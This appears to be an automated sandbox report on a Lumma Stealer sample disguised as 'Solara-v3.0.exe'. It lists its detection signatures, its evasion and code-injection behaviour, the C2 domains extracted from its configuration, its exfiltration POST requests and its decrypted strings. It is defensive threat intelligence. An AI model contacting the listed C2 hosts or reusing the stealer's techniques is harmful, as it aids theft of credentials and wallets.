Windows Analysis Report
Solara-v3.0.exe

Overview

General Information

Sample name: Solara-v3.0.exe
Analysis ID: 1581538
MD5: ac461b5d5ac030c7cc5c2f48efc44668
SHA1: 86ed7c32e2539962ad29e046775025d9ec6ffdd6
SHA256: 65f1f08a9fbd495e5544503df844e89d6ea7fdcad4a5cb56236fc10b624173be
Tags: exe, user-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Solara-v3.0.exe (PID: 5004 cmdline: "C:\Users\user\Desktop\Solara-v3.0.exe" MD5: AC461B5D5AC030C7CC5C2F48EFC44668)
    • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara-v3.0.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\Solara-v3.0.exe" MD5: AC461B5D5AC030C7CC5C2F48EFC44668)
    • Solara-v3.0.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\Solara-v3.0.exe" MD5: AC461B5D5AC030C7CC5C2F48EFC44668)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["screwamusresz.buzz", "mindhandru.buzz", "inherineau.buzz", "cashfuzysao.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "appliacnesot.buzz", "hummskitnj.buzz"], "Build id": "yau6Na--899083440"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000003.2193850105.000000000331F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(8 further entries not shown)

Source | Rule | Description | Author | Strings
4.2.Solara-v3.0.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
4.2.Solara-v3.0.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-28T02:54:59.800180+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T02:55:02.189349+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:04.234024+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:06.674165+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:08.988622+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:11.790231+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:14.249228+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:16.798762+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:20.536647+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49727 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:02.927391+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:05.008074+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:21.336316+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49727 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:02.927391+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:05.008074+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T02:54:57.703572+0100 | 2058572 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49614 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.846935+0100 | 2058576 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 50352 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.993945+0100 | 2058578 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55504 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.422764+0100 | 2058580 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56762 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:56.855361+0100 | 2058582 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49776 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:56.997814+0100 | 2058584 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57431 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.140993+0100 | 2058586 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57700 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.283504+0100 | 2058588 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55478 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.564017+0100 | 2058590 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61762 | 1.1.1.1 | 53 | UDP
2024-12-28T02:55:07.625903+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49711 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:00.570475+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49708 | 23.55.153.106 | 443 | TCP

AV Detection

Source: https://lev-tolstoi.com/p | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/m | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/i | Avira URL Cloud: Label: malware
Source: https://scentniej.buzz/api0 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/w | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiinhpmnjffcofjonbfbgaoc | Avira URL Cloud: Label: malware
Source: https://appliacnesot.buzz/api | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiifaf) | Avira URL Cloud: Label: malware
Source: https://cashfuzysao.buzz/apiB | Avira URL Cloud: Label: malware
Source: https://inherineau.buzz/api | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api2Y61 | Avira URL Cloud: Label: malware
Source: https://hummskitnj.buzz/api | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "mindhandru.buzz", "inherineau.buzz", "cashfuzysao.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "appliacnesot.buzz", "hummskitnj.buzz"], "Build id": "yau6Na--899083440"}
Source: Solara-v3.0.exe | ReversingLabs: Detection: 36%
Source: Solara-v3.0.exe | Virustotal: Detection: 50%
Source: Solara-v3.0.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp
String decryptor: hummskitnj.buzz
String decryptor: cashfuzysao.buzz
String decryptor: appliacnesot.buzz
String decryptor: screwamusresz.buzz
String decryptor: inherineau.buzz
String decryptor: scentniej.buzz
String decryptor: rebuildeso.buzz
String decryptor: prisonyfork.buzz
String decryptor: mindhandru.buzz
String decryptor: lid=%s&j=%s&ver=4.0
String decryptor: TeslaBrowser/5.5
String decryptor: - Screen Resoluton:
String decryptor: - Physical Installed Memory:
String decryptor: Workgroup: -
String decryptor: yau6Na--899083440
Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 4_2_00414E25 CryptUnprotectData,4_2_00414E25
Source: Solara-v3.0.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CB1FE9
Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1F38 FindFirstFileExW,0_2_00CB1F38
Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00CB1FE9
Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1F38 FindFirstFileExW,3_2_00CB1F38

                    Networking

                    barindex
                    Source: Network traffic | Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.5:55504 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.5:50352 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.5:57431 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.5:61762 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.5:49776 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.5:55478 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.5:49614 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.5:56762 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.5:57700 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49708 -> 23.55.153.106:443
                    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49709 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49709 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49710 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49710 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49711 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49727 -> 104.21.66.86:443
                    Source: Malware configuration extractor | URLs: screwamusresz.buzz
                    Source: Malware configuration extractor | URLs: mindhandru.buzz
                    Source: Malware configuration extractor | URLs: inherineau.buzz
                    Source: Malware configuration extractor | URLs: cashfuzysao.buzz
                    Source: Malware configuration extractor | URLs: scentniej.buzz
                    Source: Malware configuration extractor | URLs: rebuildeso.buzz
                    Source: Malware configuration extractor | URLs: prisonyfork.buzz
                    Source: Malware configuration extractor | URLs: appliacnesot.buzz
                    Source: Malware configuration extractor | URLs: hummskitnj.buzz
                    Source: Joe Sandbox View | IP Address: 104.21.66.86
                    Source: Joe Sandbox View | IP Address: 23.55.153.106
                    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 23.55.153.106:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.66.86:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49727 -> 104.21.66.86:443
                    Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 51 | Host: lev-tolstoi.com
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=YGVW96CC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12779 | Host: lev-tolstoi.com
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=G5YA9UVL8817 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15045 | Host: lev-tolstoi.com
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3E8GBOWGO | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20517 | Host: lev-tolstoi.com
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6TP36CE1PS1S0XVX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1262 | Host: lev-tolstoi.com
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4BTBIVQQDUXSJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 565698 | Host: lev-tolstoi.com
                    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: lev-tolstoi.com
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
                    Source: global traffic | DNS traffic detected: DNS query: prisonyfork.buzz
                    Source: global traffic | DNS traffic detected: DNS query: rebuildeso.buzz
                    Source: global traffic | DNS traffic detected: DNS query: scentniej.buzz
                    Source: global traffic | DNS traffic detected: DNS query: inherineau.buzz
                    Source: global traffic | DNS traffic detected: DNS query: screwamusresz.buzz
                    Source: global traffic | DNS traffic detected: DNS query: appliacnesot.buzz
                    Source: global traffic | DNS traffic detected: DNS query: cashfuzysao.buzz
                    Source: global traffic | DNS traffic detected: DNS query: hummskitnj.buzz
                    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                    Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
                    Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: Solara-v3.0.exe, 00000004.00000003.2220043538.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2215763251.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193850105.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2219935945.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193758527.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/api
                    Source: Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inherineau.buzz/api
